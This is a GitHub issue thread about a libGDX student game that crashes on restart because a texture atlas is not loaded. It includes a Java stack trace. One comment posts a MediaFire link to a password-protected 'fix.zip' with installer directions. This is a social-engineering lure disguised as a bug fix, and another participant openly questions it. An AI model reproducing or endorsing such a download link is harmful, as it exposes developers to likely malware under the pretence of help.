### ISSUE TITLE
Game crash upon exit and restart

### ISSUE THREAD

**Issue by IanP96** [UQcsse3200/2024-studio-1#116]
# Description
When you start a game, exit using the button on the top-right corner, then start a game again, the game crashes.

# How To Reproduce
Steps to reproduce the behaviour:
1. Start the game on Easy difficulty (the error would probably happen regardless of the difficulty chosen)
2. Exit the game using the button on the top-right corner
3. Start the game again on Easy difficulty
4. Crash

# Expected Behaviour
Should start a new game instead of crashing.

# Error logs
```
Exception in thread "main" java.lang.RuntimeException: Actor: TextButton: Easy
        at com.badlogic.gdx.scenes.scene2d.Actor.notify(Actor.java:192)
        at com.badlogic.gdx.scenes.scene2d.Actor.fire(Actor.java:152)
        at com.badlogic.gdx.scenes.scene2d.ui.Button.setChecked(Button.java:125)
        at com.badlogic.gdx.scenes.scene2d.ui.Button$1.clicked(Button.java:93)
        at com.badlogic.gdx.scenes.scene2d.utils.ClickListener.touchUp(ClickListener.java:88)
        at com.badlogic.gdx.scenes.scene2d.InputListener.handle(InputListener.java:71)
        at com.badlogic.gdx.scenes.scene2d.Stage.touchUp(Stage.java:355)
        at com.csse3200.game.input.InputDecorator.touchUp(InputDecorator.java:55)
        at com.csse3200.game.input.InputService.touchUp(InputService.java:213)
        at com.badlogic.gdx.InputEventQueue.drain(InputEventQueue.java:70)
        at com.badlogic.gdx.backends.lwjgl3.DefaultLwjgl3Input.update(DefaultLwjgl3Input.java:189)
        at com.badlogic.gdx.backends.lwjgl3.Lwjgl3Window.update(Lwjgl3Window.java:378)
        at com.badlogic.gdx.backends.lwjgl3.Lwjgl3Application.loop(Lwjgl3Application.java:192)
        at com.badlogic.gdx.backends.lwjgl3.Lwjgl3Application.<init>(Lwjgl3Application.java:166)
        at com.csse3200.game.desktop.DesktopLauncher.main(DesktopLauncher.java:9)
Caused by: com.badlogic.gdx.utils.GdxRuntimeException: Asset not loaded: images/rat.atlas
        at com.badlogic.gdx.assets.AssetManager.get(AssetManager.java:172)
        at com.badlogic.gdx.assets.AssetManager.get(AssetManager.java:143)
        at com.csse3200.game.services.ResourceService.getAsset(ResourceService.java:43)
        at com.csse3200.game.entities.factories.NPCFactory.createRat(NPCFactory.java:86)
        at com.csse3200.game.areas.EntitySpawner.spawnAnimal(EntitySpawner.java:76)
        at com.csse3200.game.areas.EntitySpawner.spawnAnimalGroup(EntitySpawner.java:49)
        at com.csse3200.game.areas.ForestGameArea.spawnEntities(ForestGameArea.java:172)
        at com.csse3200.game.areas.ForestGameArea.create(ForestGameArea.java:115)
        at com.csse3200.game.screens.MainGameScreen.<init>(MainGameScreen.java:84)
        at com.csse3200.game.GdxGame.newScreen(GdxGame.java:75)
        at com.csse3200.game.GdxGame.setScreen(GdxGame.java:56)
        at com.csse3200.game.components.mainmenu.MainMenuActions.onStart(MainMenuActions.java:37)
        at com.csse3200.game.events.EventHandler.lambda$trigger$1(EventHandler.java:99)
        at java.base/java.lang.Iterable.forEach(Iterable.java:75)
        at com.csse3200.game.events.EventHandler.forEachListener(EventHandler.java:152)
        at com.csse3200.game.events.EventHandler.trigger(EventHandler.java:98)
        at com.csse3200.game.components.mainmenu.MainMenuDisplay$2.changed(MainMenuDisplay.java:93)
        at com.badlogic.gdx.scenes.scene2d.utils.ChangeListener.handle(ChangeListener.java:28)
        at com.badlogic.gdx.scenes.scene2d.Actor.notify(Actor.java:188)
        ... 14 more
```

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SIN-Willett** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Umm what?... if this is a real fix just push it... who would click that link

**Comment by IanP96** [comment]
No longer occurs
